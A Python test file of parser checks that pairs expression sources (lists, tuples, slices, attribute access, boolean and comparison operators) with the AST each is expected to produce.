check('''[]''', Suite((Call('return', Call('list')),)))
check('''[3]''', Suite((Call('return', Call('list', Const(3))),)))
check('''[3,]''', Suite((Call('return', Call('list', Const(3))),)))
check('''[3, 4]''', Suite((Call('return', Call('list', Const(3), Const(4))),)))
check('''[3, 4,]''', Suite((Call('return', Call('list', Const(3), Const(4))),)))
check('''[3, 4, 5]''', Suite((Call('return', Call('list', Const(3), Const(4), Const(5))),)))
check('''[3, 4, 5,]''', Suite((Call('return', Call('list', Const(3), Const(4), Const(5))),)))
check('''[3, 4, 5, 6]''', Suite((Call('return', Call('list', Const(3), Const(4), Const(5), Const(6))),)))
check('''[3, 4, 5, 6,]''', Suite((Call('return', Call('list', Const(3), Const(4), Const(5), Const(6))),)))
check('''[[1], 2, 3, 4, 5]''', Suite((Call('return', Call('list', Call('list', Const(1)), Const(2), Const(3), Const(4), Const(5))),)))
check('''[[1, 2], 3, 4, 5]''', Suite((Call('return', Call('list', Call('list', Const(1), Const(2)), Const(3), Const(4), Const(5))),)))
check('''[[1, 2, 3], 4, 5]''', Suite((Call('return', Call('list', Call('list', Const(1), Const(2), Const(3)), Const(4), Const(5))),)))
check('''[[1, 2, 3, 4], 5]''', Suite((Call('return', Call('list', Call('list', Const(1), Const(2), Const(3), Const(4)), Const(5))),)))
check('''[[1, 2, 3, 4, 5]]''', Suite((Call('return', Call('list', Call('list', Const(1), Const(2), Const(3), Const(4), Const(5)))),)))
check('''[[[1], 2, 3, 4, 5]]''', Suite((Call('return', Call('list', Call('list', Call('list', Const(1)), Const(2), Const(3), Const(4), Const(5)))),)))
check('''[[[1, 2], 3, 4, 5]]''', Suite((Call('return', Call('list', Call('list', Call('list', Const(1), Const(2)), Const(3), Const(4), Const(5)))),)))
check('''[[[1, 2, 3], 4, 5]]''', Suite((Call('return', Call('list', Call('list', Call('list', Const(1), Const(2), Const(3)), Const(4), Const(5)))),)))
check('''[[[1, 2, 3, 4], 5]]''', Suite((Call('return', Call('list', Call('list', Call('list', Const(1), Const(2), Const(3), Const(4)), Const(5)))),)))
check('''[[[1, 2, 3, 4, 5]]]''', Suite((Call('return', Call('list', Call('list', Call('list', Const(1), Const(2), Const(3), Const(4), Const(5))))),)))
check('''[1, 2, 3, 4, [5]]''', Suite((Call('return', Call('list', Const(1), Const(2), Const(3), Const(4), Call('list', Const(5)))),)))
check('''[1, 2, 3, [4, 5]]''', Suite((Call('return', Call('list', Const(1), Const(2), Const(3), Call('list', Const(4), Const(5)))),)))
check('''[1, 2, [3, 4, 5]]''', Suite((Call('return', Call('list', Const(1), Const(2), Call('list', Const(3), Const(4), Const(5)))),)))
check('''[1, [2, 3, 4, 5]]''', Suite((Call('return', Call('list', Const(1), Call('list', Const(2), Const(3), Const(4), Const(5)))),)))
check('''[[1, 2, 3, 4, [5]]]''', Suite((Call('return', Call('list', Call('list', Const(1), Const(2), Const(3), Const(4), Call('list', Const(5))))),)))
check('''[[1, 2, 3, [4, 5]]]''', Suite((Call('return', Call('list', Call('list', Const(1), Const(2), Const(3), Call('list', Const(4), Const(5))))),)))
check('''[[1, 2, [3, 4, 5]]]''', Suite((Call('return', Call('list', Call('list', Const(1), Const(2), Call('list', Const(3), Const(4), Const(5))))),)))
check('''[[1, [2, 3, 4, 5]]]''', Suite((Call('return', Call('list', Call('list', Const(1), Call('list', Const(2), Const(3), Const(4), Const(5))))),)))
check('''x = (None)''', Suite((Assign((Name('x'),), Const(None)), Call('return', Const(None)),)))
check('''x = (3, None)''', Suite((Assign((Name('x'),), Call('tuple', Const(3), Const(None))), Call('return', Const(None)),)))
check('''x = (3, 4, None)''', Suite((Assign((Name('x'),), Call('tuple', Const(3), Const(4), Const(None))), Call('return', Const(None)),)))
check('''x = (3, 4, 5, None)''', Suite((Assign((Name('x'),), Call('tuple', Const(3), Const(4), Const(5), Const(None))), Call('return', Const(None)),)))
check('''x = (3, 4, 5, 6, None)''', Suite((Assign((Name('x'),), Call('tuple', Const(3), Const(4), Const(5), Const(6), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, None), 2, 3, 4, 5, None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Const(None)), Const(2), Const(3), Const(4), Const(5), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, 2, None), 3, 4, 5, None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Const(2), Const(None)), Const(3), Const(4), Const(5), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, 2, 3, None), 4, 5, None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Const(2), Const(3), Const(None)), Const(4), Const(5), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, 2, 3, 4, None), 5, None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Const(2), Const(3), Const(4), Const(None)), Const(5), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, 2, 3, 4, 5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Const(2), Const(3), Const(4), Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (((1, None), 2, 3, 4, 5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Call('tuple', Const(1), Const(None)), Const(2), Const(3), Const(4), Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (((1, 2, None), 3, 4, 5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Call('tuple', Const(1), Const(2), Const(None)), Const(3), Const(4), Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (((1, 2, 3, None), 4, 5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Call('tuple', Const(1), Const(2), Const(3), Const(None)), Const(4), Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (((1, 2, 3, 4, None), 5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Call('tuple', Const(1), Const(2), Const(3), Const(4), Const(None)), Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (((1, 2, 3, 4, 5, None), None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Call('tuple', Const(1), Const(2), Const(3), Const(4), Const(5), Const(None)), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (1, 2, 3, 4, (5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Const(1), Const(2), Const(3), Const(4), Call('tuple', Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (1, 2, 3, (4, 5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Const(1), Const(2), Const(3), Call('tuple', Const(4), Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (1, 2, (3, 4, 5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Const(1), Const(2), Call('tuple', Const(3), Const(4), Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (1, (2, 3, 4, 5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Const(1), Call('tuple', Const(2), Const(3), Const(4), Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, 2, 3, 4, (5, None), None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Const(2), Const(3), Const(4), Call('tuple', Const(5), Const(None)), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, 2, 3, (4, 5, None), None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Const(2), Const(3), Call('tuple', Const(4), Const(5), Const(None)), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, 2, (3, 4, 5, None), None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Const(2), Call('tuple', Const(3), Const(4), Const(5), Const(None)), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, (2, 3, 4, 5, None), None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Call('tuple', Const(2), Const(3), Const(4), Const(5), Const(None)), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''3
''', Suite((Call('return', Const(None)),))) # hey look: Python does dead code removal!
check('''3
''', Suite((Call('return', Const(None)),)))
check('''3
''', Suite((Call('return', Const(None)),)))
check('''3
''', Suite((Call('return', Const(None)),)))
check('''
3''', Suite((Call('return', Const(None)),)))
check('''
3''', Suite((Call('return', Const(None)),)))
check('''
3''', Suite((Call('return', Const(None)),)))
check('''
3''', Suite((Call('return', Const(None)),)))
check('''a''', Suite((Call('return', Name('a')),)))
check('''a.b''', Suite((Call('return', Call('.', Name('a'), 'b')),)))
check('''a.b.c''', Suite((Call('return', Call('.', Call('.', Name('a'), 'b'), 'c')),)))
check('''a.b.c.d''', Suite((Call('return', Call('.', Call('.', Call('.', Name('a'), 'b'), 'c'), 'd')),)))
check('''a.b.c.d.e''', Suite((Call('return', Call('.', Call('.', Call('.', Call('.', Name('a'), 'b'), 'c'), 'd'), 'e')),)))
check('''a[1]''', Suite((Call('return', Call('[.]', Name('a'), Const(1))),)))
check('''a[1][2]''', Suite((Call('return', Call('[.]', Call('[.]', Name('a'), Const(1)), Const(2))),)))
check('''a[1][2][3]''', Suite((Call('return', Call('[.]', Call('[.]', Call('[.]', Name('a'), Const(1)), Const(2)), Const(3))),)))
check('''a[1][2][3][4]''', Suite((Call('return', Call('[.]', Call('[.]', Call('[.]', Call('[.]', Name('a'), Const(1)), Const(2)), Const(3)), Const(4))),)))
check('''(9, None).stuff''', Suite((Call('return', Call('.', Call('tuple', Const(9), Const(None)), 'stuff')),)))
check('''((9, None), None).stuff''', Suite((Call('return', Call('.', Call('tuple', Call('tuple', Const(9), Const(None)), Const(None)), 'stuff')),)))
check('''(((9, None), None), None).stuff''', Suite((Call('return', Call('.', Call('tuple', Call('tuple', Call('tuple', Const(9), Const(None)), Const(None)), Const(None)), 'stuff')),)))
check('''a[1]''', Suite((Call('return', Call('[.]', Name('a'), Const(1))),)))
check('''a["hey"]''', Suite((Call('return', Call('[.]', Name('a'), Const('hey'))),)))
check('''a[1:2]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)))),)))
check('''a[:]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)))),)))
check('''a[1:]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)))),)))
check('''a[:1]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)))),)))
check('''a[::]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)))),)))
check('''a[1::]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)))),)))
check('''a[:1:]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)))),)))
check('''a[::1]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(1)))),)))
check('''a[1:2:]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)))),)))
check('''a[:1:2]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(2)))),)))
check('''a[1::2]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(2)))),)))
check('''a[1:2:3]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(3)))),)))
check('''a[1,]''', Suite((Call('return', Call('[.]', Name('a'), Const(1))),)))
check('''a["hey",]''', Suite((Call('return', Call('[.]', Name('a'), Const('hey'))),)))
check('''a[1:2,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)))),)))
check('''a[:,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)))),)))
check('''a[1:,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)))),)))
check('''a[:1,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)))),)))
check('''a[::,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)))),)))
check('''a[1::,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)))),)))
check('''a[:1:,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)))),)))
check('''a[::1,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(1)))),)))
check('''a[1:2:,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)))),)))
check('''a[:1:2,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(2)))),)))
check('''a[1::2,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(2)))),)))
check('''a[1:2:3,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(3)))),)))
check('''a[1,5]''', Suite((Call('return', Call('[.]', Name('a'), Const(1), Const(5))),)))
check('''a["hey",5]''', Suite((Call('return', Call('[.]', Name('a'), Const('hey'), Const(5))),)))
check('''a[1:2,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)), Const(5))),)))
check('''a[:,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)), Const(5))),)))
check('''a[1:,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)), Const(5))),)))
check('''a[:1,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)), Const(5))),)))
check('''a[::,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)), Const(5))),)))
check('''a[1::,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)), Const(5))),)))
check('''a[:1:,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)), Const(5))),)))
check('''a[::1,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(1)), Const(5))),)))
check('''a[1:2:,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)), Const(5))),)))
check('''a[:1:2,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(2)), Const(5))),)))
check('''a[1::2,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(2)), Const(5))),)))
check('''a[1:2:3,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(3)), Const(5))),)))
check('''a[1,5,]''', Suite((Call('return', Call('[.]', Name('a'), Const(1), Const(5))),)))
check('''a["hey",5,]''', Suite((Call('return', Call('[.]', Name('a'), Const('hey'), Const(5))),)))
check('''a[1:2,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)), Const(5))),)))
check('''a[:,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)), Const(5))),)))
check('''a[1:,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)), Const(5))),)))
check('''a[:1,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)), Const(5))),)))
check('''a[::,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)), Const(5))),)))
check('''a[1::,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)), Const(5))),)))
check('''a[:1:,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)), Const(5))),)))
check('''a[::1,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(1)), Const(5))),)))
check('''a[1:2:,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)), Const(5))),)))
check('''a[:1:2,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(2)), Const(5))),)))
check('''a[1::2,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(2)), Const(5))),)))
check('''a[1:2:3,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(3)), Const(5))),)))
check('''a[1,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Const(1), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a["hey","a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Const('hey'), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1:2,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(2), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[:,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(None), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1:,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(None), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[:1,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(1), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[::,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(None), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1::,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(None), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[:1:,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(1), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[::1,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(None), Const(1)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1:2:,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(2), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[:1:2,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(1), Const(2)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1::2,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(None), Const(2)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1:2:3,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(2), Const(3)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Const(1), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a["hey","a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Const('hey'), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1:2,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(2), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[:,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(None), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1:,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(None), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[:1,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(1), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[::,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(None), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1::,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(None), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[:1:,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(1), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[::1,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(None), Const(1)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1:2:,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(2), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[:1:2,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(1), Const(2)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1::2,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(None), Const(2)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1:2:3,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(2), Const(3)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Const(1), Const(5), Const(6))),)))
check('''a["hey",5,6]''', Suite((Call('return', Call('[.]', Name('a'), Const('hey'), Const(5), Const(6))),)))
check('''a[1:2,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)), Const(5), Const(6))),)))
check('''a[:,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)), Const(5), Const(6))),)))
check('''a[1:,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)), Const(5), Const(6))),)))
check('''a[:1,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)), Const(5), Const(6))),)))
check('''a[::,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)), Const(5), Const(6))),)))
check('''a[1::,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)), Const(5), Const(6))),)))
check('''a[:1:,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)), Const(5), Const(6))),)))
check('''a[::1,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(1)), Const(5), Const(6))),)))
check('''a[1:2:,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)), Const(5), Const(6))),)))
check('''a[:1:2,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(2)), Const(5), Const(6))),)))
check('''a[1::2,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(2)), Const(5), Const(6))),)))
check('''a[1:2:3,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(3)), Const(5), Const(6))),)))
check('''a[1,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Const(1), Const(5), Const(6))),)))
check('''a["hey",5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Const('hey'), Const(5), Const(6))),)))
check('''a[1:2,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)), Const(5), Const(6))),)))
check('''a[:,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)), Const(5), Const(6))),)))
check('''a[1:,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)), Const(5), Const(6))),)))
check('''a[:1,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)), Const(5), Const(6))),)))
check('''a[::,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)), Const(5), Const(6))),)))
check('''a[1::,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)), Const(5), Const(6))),)))
check('''a[:1:,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)), Const(5), Const(6))),)))
check('''a[::1,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(1)), Const(5), Const(6))),)))
check('''a[1:2:,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)), Const(5), Const(6))),)))
check('''a[:1:2,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(2)), Const(5), Const(6))),)))
check('''a[1::2,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(2)), Const(5), Const(6))),)))
check('''a[1:2:3,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(3)), Const(5), Const(6))),)))
check('''a[1:[2]:3,[],5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Call('list', Const(2)), Const(3)), Call('list'), Const(5), Const(6))),)))
check('''a[1:[[2]]:3,[[]],5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Call('list', Call('list', Const(2))), Const(3)), Call('list', Call('list')), Const(5), Const(6))),)))
check('''a[2].three''', Suite((Call('return', Call('.', Call('[.]', Name('a'), Const(2)), 'three')),)))
check('''a.three''', Suite((Call('return', Call('.', Name('a'), 'three')),)))
check('''a[2]''', Suite((Call('return', Call('[.]', Name('a'), Const(2))),)))
check('''a.three[2]''', Suite((Call('return', Call('[.]', Call('.', Name('a'), 'three'), Const(2))),)))
check('''x and y''', Suite((Call('return', Call('and', Name('x'), Name('y'))),)))
check('''x and y and z''', Suite((Call('return', Call('and', Name('x'), Call('and', Name('y'), Name('z')))),)))
check('''x and y and z and w''', Suite((Call('return', Call('and', Name('x'), Call('and', Name('y'), Call('and', Name('z'), Name('w'))))),)))
check('''not x''', Suite((Call('return', Call('not', Name('x'))),)))
check('''not x and y''', Suite((Call('return', Call('and', Call('not', Name('x')), Name('y'))),)))
check('''x or y''', Suite((Call('return', Call('or', Name('x'), Name('y'))),)))
check('''x or y and z''', Suite((Call('return', Call('or', Name('x'), Call('and', Name('y'), Name('z')))),)))
check('''x or y or z''', Suite((Call('return', Call('or', Name('x'), Call('or', Name('y'), Name('z')))),)))
check('''not x or y and z''', Suite((Call('return', Call('or', Call('not', Name('x')), Call('and', Name('y'), Name('z')))),)))
check('''x or not y and z''', Suite((Call('return', Call('or', Name('x'), Call('and', Call('not', Name('y')), Name('z')))),)))
check('''x or y and not z''', Suite((Call('return', Call('or', Name('x'), Call('and', Name('y'), Call('not', Name('z'))))),)))
check('''not x or not y and z''', Suite((Call('return', Call('or', Call('not', Name('x')), Call('and', Call('not', Name('y')), Name('z')))),)))
check('''not x or y and not z''', Suite((Call('return', Call('or', Call('not', Name('x')), Call('and', Name('y'), Call('not', Name('z'))))),)))
check('''x or not y and not z''', Suite((Call('return', Call('or', Name('x'), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check('''not x or not y and not z''', Suite((Call('return', Call('or', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check('''x and y or z''', Suite((Call('return', Call('or', Call('and', Name('x'), Name('y')), Name('z'))),)))
check('''not x and y or z''', Suite((Call('return', Call('or', Call('and', Call('not', Name('x')), Name('y')), Name('z'))),)))
check('''x and not y or z''', Suite((Call('return', Call('or', Call('and', Name('x'), Call('not', Name('y'))), Name('z'))),)))
check('''x and y or not z''', Suite((Call('return', Call('or', Call('and', Name('x'), Name('y')), Call('not', Name('z')))),)))
check('''not x and not y or z''', Suite((Call('return', Call('or', Call('and', Call('not', Name('x')), Call('not', Name('y'))), Name('z'))),)))
check('''not x and y or not z''', Suite((Call('return', Call('or', Call('and', Call('not', Name('x')), Name('y')), Call('not', Name('z')))),)))
# --- Boolean precedence and comparison operators -----------------------------
# Each check(src, ast) pair asserts that the parser turns the source expression
# into exactly the AST shown.  A bare expression program compiles to
# Call('return', <expr>); tuple displays become Call('tuple', ...).
# Chained comparisons (a < b < c) desugar to Call('and', a<b, b<c);
# NOTE(review): the middle operand appears twice in that AST — presumably the
# evaluator guards against double evaluation, but that is not visible here.
check('''x and not y or not z''', Suite((Call('return', Call('or', Call('and', Name('x'), Call('not', Name('y'))), Call('not', Name('z')))),)))
check('''x < y''', Suite((Call('return', Call('<', Name('x'), Name('y'))),)))
check('''x > y''', Suite((Call('return', Call('>', Name('x'), Name('y'))),)))
check('''x == y''', Suite((Call('return', Call('==', Name('x'), Name('y'))),)))
check('''x >= y''', Suite((Call('return', Call('>=', Name('x'), Name('y'))),)))
check('''x <= y''', Suite((Call('return', Call('<=', Name('x'), Name('y'))),)))
check('''x != y''', Suite((Call('return', Call('!=', Name('x'), Name('y'))),)))
check('''x in y''', Suite((Call('return', Call('in', Name('x'), Name('y'))),)))
check('''x not in y''', Suite((Call('return', Call('not-in', Name('x'), Name('y'))),)))
check('''1 < y < 2''', Suite((Call('return', Call('and', Call('<', Const(1), Name('y')), Call('<', Name('y'), Const(2)))),)))
